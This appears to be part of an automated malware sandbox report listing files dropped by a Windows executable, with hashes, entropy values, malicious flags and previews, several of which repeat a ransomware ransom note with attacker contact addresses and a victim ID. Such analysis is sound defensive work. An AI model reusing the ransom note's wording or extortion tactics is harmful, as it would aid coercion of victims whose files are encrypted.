                                                                                                                                            SHA-512:5ABD61ECADCBC8B4EDEBB1ECA626E8B1897E7C4C29234571B878772EDCF1DBB577B7AD01A0F76D65657E0420EC646744C6B1E7661EE66A1333474DE4CA895E70
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L.@.{....'gI .q..;-..4)Mh..juW.ome.rP...v.,....}.....v.Y=^..`......>:.c[..=D.3a|..,....%W0...8.XN.D.S..,.}.......57........^.!....0.5........:.].'...l.db............-.<H.5v):.8HR.w|k..H.G.g.*...Q.w.is^..a!\.........0Zu.....N. ......lRzSg..._N.k.{.....<..X......DR.N.....S...0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49418
                                                                                                                                            Entropy (8bit):1.1537553294005936
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:qNT1HUvmF0X+T34JXy/EGChqWInimYKH+LsMtIPUw6HOPq6:qNxB0u0JXy/EGChqWmTPeLDtNwVPr
                                                                                                                                            MD5:CB533653DE0EA7B4716BC89EC6FB5EE9
                                                                                                                                            SHA1:E98DF183855E8174255B043A541326B0D1349872
                                                                                                                                            SHA-256:EE34ADF88127BF201EBB2DC783BDFA6292E9552630B2AC8509067ED2EDAE71FB
                                                                                                                                            SHA-512:A9EFD2EB77439C1D6107C6DDD7A576A5B6D6AD650A81D5CD61B2E0A5B49A3C1BA898BCC6F2B387FD6B314BF1A10B37FBF46618F39CF22C54D4BD8C54A9C8CB00
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:...8....xb........}.\O.....7.u....n..Ps..k.q..d..d+...Rn....h.........0..gS...&A....._.l...|..'.4D...`....q.. ......:.Q.5I....t..B.?...&.,i.....D..;H_.B.<eKl.L..[..O.~.u.1..E..=>....`........U..................H.."....H...:.]..~.6.0C.W9....(.'....m=.`..xAv...p..Ae.xE....Z...... .........(2.ig.....a....ja....\....=...<......lwW...)..`.2..........M.bG......h.i8%...&.....J..A....Q yz..L.3.-....5..M@K..! ...$.g.}$...@....O.H..C.B..+D.c..5....~.<e.0......>B6..5.....E..p...".I...=<.?~....n..%.kM..I...')....E.Hpj./.3l..`...~b1...HvG..p.n.=...<4....@...d..F.%t4o.+?h..$._...tzGq....v[i\(.j6.]..;...Z.Sg$b../v]....D>78.f{.5a7C.' ].B\-.v..3.d..U.>.+RH.;3......IW.?_0......V`E[.....}..62....1+.W..<.~.......x..*.@... .x..O.'.L........^.........4.\........c...6..}..r]...fb(..*3..f......<.....f.q.~.E...!xv..b...'~..&..A.....A..X.M....r..2......."B"0..:`.5.e....a...&......./...Xq.*....0HC..q.0.....N?.0.,i.r4.ON...t.;...lH..8y}9"..n1|...|-...m.T/{.7...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.6068455442360305
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:2Yxv4XIPTtw0CBYhZXHr5doPUk8VEbKSETurNH3OUbujiiq/Ux+kXK:7KXQT8ufLjgUk8UqWpLbuDqi+eK
                                                                                                                                            MD5:3E8C74C26F8EE88EE3FBC545E92CFC3D
                                                                                                                                            SHA1:4F32DB6EF032E0415679C649D7D6830B6005374C
                                                                                                                                            SHA-256:C252391B67DCF0EA2E44AA3394C3AE816C0C4E7E0B85D8A18EA1BF0BEC1D2DFF
                                                                                                                                            SHA-512:214E80A7FD67AAD313806E9A13EE002B322C9F913A5070672AF05C452A2607824540268521B6D88D63B97C1D52EE1FD0FFA089DB0F9D83760F8F006F9A81261C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:... X.A.Z....}A.K.Ut..........ou....WH..."{d(W..K...c....7...!..-.H}.r.U.........3...`.F..7.xZ..JZ..m.4../..U.J....M.tS.Vx.'v.nQ3!a.hK..G......\....yY..`gOf...d|D..(=.E....V.TvW.ns......N\+Q.l..H..wI,h...lH........^c..a+.P-..~U.J...4R~.j...X........{.-n..m.Ccv.F...*.>..Z.#.....e..d".:b. ..9...>C7U.>.mes_..|.T2E..[...3 Di.+&k.x<v.?.S.1.....P9..>uI.o<.......{Q.[B!...:7....@.*...B.nVtV=f."..+aS..c.>0]O#...E..+IAy/.....M^.esw.d......S.0.C.'.4!c..]..Ln=...[.....Ma....o6....(.6V..=..n7s...E...8z..Kx.ea..O..]..b....r...........^.J.9I..(.D;.GhB.x......B.<.]..X"n..P...>3..\a.(`0d.....1...;...b...E..A...K9H$1>...<.N.(C..@,8\.kE....(.|..T+...-.y..]...)..f....p.A.yrD...........d...O.S.w..Ga.A.Kj.......A.M%V...`.m.....-.W>...i_.h.....1..7.u..km...JYm...A:..b..2.[...".V...G.2.. .1..O....7.z.....vhFc.f..=.:H~A...C.p..g........g.<..cc.S-.e=.}R8..)....$.l...GD...[.e/._A.#n....e.+5..........XC\......*&L.....&U2Q.N.0'[...X..D...kS-T...I&..5.......7...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.6068455442360305
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:2Yxv4XIPTtw0CBYhZXHr5doPUk8VEbKSETurNH3OUbujiiq/Ux+kXK:7KXQT8ufLjgUk8UqWpLbuDqi+eK
                                                                                                                                            MD5:3E8C74C26F8EE88EE3FBC545E92CFC3D
                                                                                                                                            SHA1:4F32DB6EF032E0415679C649D7D6830B6005374C
                                                                                                                                            SHA-256:C252391B67DCF0EA2E44AA3394C3AE816C0C4E7E0B85D8A18EA1BF0BEC1D2DFF
                                                                                                                                            SHA-512:214E80A7FD67AAD313806E9A13EE002B322C9F913A5070672AF05C452A2607824540268521B6D88D63B97C1D52EE1FD0FFA089DB0F9D83760F8F006F9A81261C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:... X.A.Z....}A.K.Ut..........ou....WH..."{d(W..K...c....7...!..-.H}.r.U.........3...`.F..7.xZ..JZ..m.4../..U.J....M.tS.Vx.'v.nQ3!a.hK..G......\....yY..`gOf...d|D..(=.E....V.TvW.ns......N\+Q.l..H..wI,h...lH........^c..a+.P-..~U.J...4R~.j...X........{.-n..m.Ccv.F...*.>..Z.#.....e..d".:b. ..9...>C7U.>.mes_..|.T2E..[...3 Di.+&k.x<v.?.S.1.....P9..>uI.o<.......{Q.[B!...:7....@.*...B.nVtV=f."..+aS..c.>0]O#...E..+IAy/.....M^.esw.d......S.0.C.'.4!c..]..Ln=...[.....Ma....o6....(.6V..=..n7s...E...8z..Kx.ea..O..]..b....r...........^.J.9I..(.D;.GhB.x......B.<.]..X"n..P...>3..\a.(`0d.....1...;...b...E..A...K9H$1>...<.N.(C..@,8\.kE....(.|..T+...-.y..]...)..f....p.A.yrD...........d...O.S.w..Ga.A.Kj.......A.M%V...`.m.....-.W>...i_.h.....1..7.u..km...JYm...A:..b..2.[...".V...G.2.. .1..O....7.z.....vhFc.f..=.:H~A...C.p..g........g.<..cc.S-.e=.}R8..)....$.l...GD...[.e/._A.#n....e.+5..........XC\......*&L.....&U2Q.N.0'[...X..D...kS-T...I&..5.......7...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.173703358476923
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:ACst//W9DePn6skaNuS5laBJW68ylGE6lv6Rhh3pjRDhOjxDn:ACMaqPGaNH7aC0V6lv6RTZN9Ojln
                                                                                                                                            MD5:E8BBFD9D2942DB5B4D8EA947B26BC06D
                                                                                                                                            SHA1:D7D4E3A2705A2EA503BAF6B584B6C07DD19464B5
                                                                                                                                            SHA-256:DCF5654C4522604987085957764D100CC9ACCAF28C8A003C7D4796D1C0BD2DB4
                                                                                                                                            SHA-512:B62CEF7C8849ABBD73646759E69C83BE6B82311B9ED170D240DD511A43C1CB525E8601E6616ED7325DABB4F26108595993A6C52C6B7B90FAB8FC99B2D0070897
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:;X.@dk...Z@pI................`<..c..l..\b.m$%.......d...TTOj........i...I..=.?.Qo.S..O.`W...%..q.|..^..]G.v..F..e...q..HU7..{.+....3(...a.E....{oj.U.....4........`...Y...u..@]...G.##.w..M.....`..e.E[........qH.g.N.@.uQ%z"..z..l*......h...!.....|.....S...L./p.....0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49418
                                                                                                                                            Entropy (8bit):1.1537553294005936
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:qNT1HUvmF0X+T34JXy/EGChqWInimYKH+LsMtIPUw6HOPq6:qNxB0u0JXy/EGChqWmTPeLDtNwVPr
                                                                                                                                            MD5:CB533653DE0EA7B4716BC89EC6FB5EE9
                                                                                                                                            SHA1:E98DF183855E8174255B043A541326B0D1349872
                                                                                                                                            SHA-256:EE34ADF88127BF201EBB2DC783BDFA6292E9552630B2AC8509067ED2EDAE71FB
                                                                                                                                            SHA-512:A9EFD2EB77439C1D6107C6DDD7A576A5B6D6AD650A81D5CD61B2E0A5B49A3C1BA898BCC6F2B387FD6B314BF1A10B37FBF46618F39CF22C54D4BD8C54A9C8CB00
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...8....xb........}.\O.....7.u....n..Ps..k.q..d..d+...Rn....h.........0..gS...&A....._.l...|..'.4D...`....q.. ......:.Q.5I....t..B.?...&.,i.....D..;H_.B.<eKl.L..[..O.~.u.1..E..=>....`........U..................H.."....H...:.]..~.6.0C.W9....(.'....m=.`..xAv...p..Ae.xE....Z...... .........(2.ig.....a....ja....\....=...<......lwW...)..`.2..........M.bG......h.i8%...&.....J..A....Q yz..L.3.-....5..M@K..! ...$.g.}$...@....O.H..C.B..+D.c..5....~.<e.0......>B6..5.....E..p...".I...=<.?~....n..%.kM..I...')....E.Hpj./.3l..`...~b1...HvG..p.n.=...<4....@...d..F.%t4o.+?h..$._...tzGq....v[i\(.j6.]..;...Z.Sg$b../v]....D>78.f{.5a7C.' ].B\-.v..3.d..U.>.+RH.;3......IW.?_0......V`E[.....}..62....1+.W..<.~.......x..*.@... .x..O.'.L........^.........4.\........c...6..}..r]...fb(..*3..f......<.....f.q.~.E...!xv..b...'~..&..A.....A..X.M....r..2......."B"0..:`.5.e....a...&......./...Xq.*....0HC..q.0.....N?.0.,i.r4.ON...t.;...lH..8y}9"..n1|...|-...m.T/{.7...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49418
                                                                                                                                            Entropy (8bit):1.1766275386378733
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:dOhNGSFb4V0iESXhAoyXjgbqnYtLUGxfcNtzLFcXRKJvT:dOhNsuaXh/yXjgbqnYtLUGxfw537
                                                                                                                                            MD5:30B761F5197BBC01419B70EF464B751F
                                                                                                                                            SHA1:F053BDF0E9762D0A061B305E3B95329DF5567C01
                                                                                                                                            SHA-256:8AAE33409B36C2A2D4855C5596DA969610300020A796CCCB8A4765A33C146F22
                                                                                                                                            SHA-512:737DAE05427874A5BFE557EF2E02B48BBC108DAFB10CA50BF987A5920B126E8FFC9DB7EDF9E0C85BE91340BCA6E115C238CBC9FBDABEC0FD985B1C1E081D80B6
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:....$.^..O>..)..>g~.R^....|..Tn."...s|.'.N.7A|._4.A...A.:.[H~..A.|.<.\=da....Z.oAu.gJ_.q.5D[..<.1.B..|..rb........zF.9l.JN.P.Zr..E....c.~!oq.g&....H..R?d)...Y.T*....7..d......,......F~_...(.cS}\.......q......G<.hS....%.7.K.f......q..(....z...........Wj..#._.....)x.)5.-.o.j,*..Sx......3.Z.`.(..2.P......s...b<M../.M.C.../.......(@.....{o.)..bn.ws,....>#v....7.G'.5..?.S.D....F.i.^...Txw....f...u..E.G+...U=.z.b_H...6....=?].IFM......".#...+pN,..;.....y..<...,...j...V.....\:.fU/@...?-(!.q..vqx..;.#.....8.H.@1.>.F..it!\.J..9.h>.<...t..P.L.&.q.jG.......<bv...."..I..k.u.cbx..'(;&p...m.V..PYd. X6O..^..$.0..xn..g.b.U..%.."..V@G.."tO/EM....O...)E.|.\.cL...`5t$.....w.y..K..e.........t}..f.&.%.a.._......,r....9.....~4.u.R.....U/S..;..)....w...2......z..p.n..p1.j%.5.l..^$...r...c2nJBW...R.|......h.pc.....scm Y..........2.d".S2..z...J.I.[.....j.J..~../..(...W.m.:...pC.^.^...(...b....F?m....,...._..<B..;K..m...P8A/84Ul5.l..qP......2OK!um...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.605457735506714
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:gDu6mL9WTsfhyf4WGIOmZj+Q/jJ1SzHF64BcI4AHuE7KHYvObi:ga9usfq4WGgljzSzHNElEPV
                                                                                                                                            MD5:BF212BEE875A5276ED41C0598DA1F2DF
                                                                                                                                            SHA1:AAC3953287DE836B0B918C91ABFDC6FCA2E191B8
                                                                                                                                            SHA-256:2B848CB69174F09D8F8CD784DABA42522F913700431FD3E035EE41A365406644
                                                                                                                                            SHA-512:D3CAC2C044519CE0A383920A43B5E4B5359C3F941B92FC85DA61DA5269C014EC6476E6CC3C7701AA760B7C224504E072CED3A2EDEC0724AB669F2AC7AED2F2BB
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:..z.......y.........D.!.5.V...'efl.VRX...L.........H'..@../...~0....'.Q......DmR)...J"(5..rK..B..Z.@.....{#.:...Q[t.*.v}.yR..=....q.......B??............M..>a..C.a.........0-...k..u.h.....^..Y#N.D.............>.z.s]$D.{.X.....d.....#.....d.iI...iI.rtjU.9...E..*%............U$4..%..1Q.!...J...n...%....j..C..o../.22...(.r,.....Ij.M..7.Je..a.U....'t(k.[.h....W8.C.f.....h....sX$......^.pO.l.. .[......l.W...i5Xd.?.f.t...zH..2Q......E.r5BZ.pe...............Qr!....zR.....*.Bg.......a.H"..........3)..7...P..... ...E|..gO.!.-.v.O..Zyew.O..p....X.&..F...:.q.....4.......1R.)n......W...b.Z7:..#.....l."...|O.m...h.k.R..o...^S-..........-..-.."[_.r7............g.....C0.....v%.0DK..2.\#,#.A^E.......zFx@..-&z.lvy......^....uO../6.SD.jn..0...G!VYT..F..7....QM..*w.m.N..[T.*/TZt+....nu..k....X..._.`*...mZ.j.0<r.....W.9k..>8..1..kh>.?._..].p.........."..w...X.E\.;...E!..A.......y......W._..7.7iA"...%z..".1.>K..U....5px......../.FL)vn..D.O...Z
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.605457735506714
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:gDu6mL9WTsfhyf4WGIOmZj+Q/jJ1SzHF64BcI4AHuE7KHYvObi:ga9usfq4WGgljzSzHNElEPV
                                                                                                                                            MD5:BF212BEE875A5276ED41C0598DA1F2DF
                                                                                                                                            SHA1:AAC3953287DE836B0B918C91ABFDC6FCA2E191B8
                                                                                                                                            SHA-256:2B848CB69174F09D8F8CD784DABA42522F913700431FD3E035EE41A365406644
                                                                                                                                            SHA-512:D3CAC2C044519CE0A383920A43B5E4B5359C3F941B92FC85DA61DA5269C014EC6476E6CC3C7701AA760B7C224504E072CED3A2EDEC0724AB669F2AC7AED2F2BB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..z.......y.........D.!.5.V...'efl.VRX...L.........H'..@../...~0....'.Q......DmR)...J"(5..rK..B..Z.@.....{#.:...Q[t.*.v}.yR..=....q.......B??............M..>a..C.a.........0-...k..u.h.....^..Y#N.D.............>.z.s]$D.{.X.....d.....#.....d.iI...iI.rtjU.9...E..*%............U$4..%..1Q.!...J...n...%....j..C..o../.22...(.r,.....Ij.M..7.Je..a.U....'t(k.[.h....W8.C.f.....h....sX$......^.pO.l.. .[......l.W...i5Xd.?.f.t...zH..2Q......E.r5BZ.pe...............Qr!....zR.....*.Bg.......a.H"..........3)..7...P..... ...E|..gO.!.-.v.O..Zyew.O..p....X.&..F...:.q.....4.......1R.)n......W...b.Z7:..#.....l."...|O.m...h.k.R..o...^S-..........-..-.."[_.r7............g.....C0.....v%.0DK..2.\#,#.A^E.......zFx@..-&z.lvy......^....uO../6.SD.jn..0...G!VYT..F..7....QM..*w.m.N..[T.*/TZt+....nu..k....X..._.`*...mZ.j.0<r.....W.9k..>8..1..kh>.?._..].p.........."..w...X.E\.;...E!..A.......y......W._..7.7iA"...%z..".1.>K..U....5px......../.FL)vn..D.O...Z
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.146052557377105
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:kYl25aZ+kTBJYtRRqxz9yBSFQu7MZ5hKLy5xghbSn:rI5aZ+kTBWtRRQMvu7MZ5hKLysMn
                                                                                                                                            MD5:C9846BC680338A3DEABB5BC0FCC003DA
                                                                                                                                            SHA1:B3A2DB076EDE1600D8AC683492D4A7FF8D8EF554
                                                                                                                                            SHA-256:4A704B6F91DD2CA98037B18DB7B7B726EB24524C30BD4A46E68430B7EA8D8DEF
                                                                                                                                            SHA-512:BA72480C79588F5AFBC28E4FA11D3465A8FC9ACD91726860342B6837BF2E0E5719606929336DCF9B7D2B57D16D3F4E2BC450CAA16CB36BAC9574C3FF2D276DB5
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:y.'4.O<.....e.U..........O....*..C..cB.5.p':.."!B.9...Q..S.....N....m.{..;..fO....tX.UV..0l...t.F......gM.<........^q6.?.bF.m...D...u4.9.....q{n.f.7D.fo.L....q.e{.=.../..D=.......7.vJ..t.......H.ZW.....u..E.4D<.|....xc...]..}.2A....~..YZ.>N......\zt..Dh. /v...K..A.320xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49418
                                                                                                                                            Entropy (8bit):1.1766275386378733
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:dOhNGSFb4V0iESXhAoyXjgbqnYtLUGxfcNtzLFcXRKJvT:dOhNsuaXh/yXjgbqnYtLUGxfw537
                                                                                                                                            MD5:30B761F5197BBC01419B70EF464B751F
                                                                                                                                            SHA1:F053BDF0E9762D0A061B305E3B95329DF5567C01
                                                                                                                                            SHA-256:8AAE33409B36C2A2D4855C5596DA969610300020A796CCCB8A4765A33C146F22
                                                                                                                                            SHA-512:737DAE05427874A5BFE557EF2E02B48BBC108DAFB10CA50BF987A5920B126E8FFC9DB7EDF9E0C85BE91340BCA6E115C238CBC9FBDABEC0FD985B1C1E081D80B6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....$.^..O>..)..>g~.R^....|..Tn."...s|.'.N.7A|._4.A...A.:.[H~..A.|.<.\=da....Z.oAu.gJ_.q.5D[..<.1.B..|..rb........zF.9l.JN.P.Zr..E....c.~!oq.g&....H..R?d)...Y.T*....7..d......,......F~_...(.cS}\.......q......G<.hS....%.7.K.f......q..(....z...........Wj..#._.....)x.)5.-.o.j,*..Sx......3.Z.`.(..2.P......s...b<M../.M.C.../.......(@.....{o.)..bn.ws,....>#v....7.G'.5..?.S.D....F.i.^...Txw....f...u..E.G+...U=.z.b_H...6....=?].IFM......".#...+pN,..;.....y..<...,...j...V.....\:.fU/@...?-(!.q..vqx..;.#.....8.H.@1.>.F..it!\.J..9.h>.<...t..P.L.&.q.jG.......<bv...."..I..k.u.cbx..'(;&p...m.V..PYd. X6O..^..$.0..xn..g.b.U..%.."..V@G.."tO/EM....O...)E.|.\.cL...`5t$.....w.y..K..e.........t}..f.&.%.a.._......,r....9.....~4.u.R.....U/S..;..)....w...2......z..p.n..p1.j%.5.l..^$...r...c2nJBW...R.|......h.pc.....scm Y..........2.d".S2..z...J.I.[.....j.J..~../..(...W.m.:...pC.^.^...(...b....F?m....,...._..<B..;K..m...P8A/84Ul5.l..qP......2OK!um...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49418
                                                                                                                                            Entropy (8bit):1.1511457344713445
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:R/HDgLDrVCuvTLQKbuH7Vs5y2f1RQtmdMEz4ZLIqLPBqFT71EibUjY:Ri/vTLxbu+42f1itmqxIqL21ElM
                                                                                                                                            MD5:0B58DD34895BF8B4A2DDBB5102821C9D
                                                                                                                                            SHA1:BB7D88E8CE5AAC0626F2CF06140187A9B935B19F
                                                                                                                                            SHA-256:0509F6EA13C4B430FE8BF1558D2DCB738B5462482E58D2D7F29D133068075117
                                                                                                                                            SHA-512:B6D7F03947E3106BE50B5CC4196BF9FE2D893F0F3FC3A688542FCEC5754DE177C79FE3AE6335B3D11FA2B556DAC71CC9E1ADD74E3B22BA1B23C18E40262D7E93
                                                                                                                                            Malicious:true
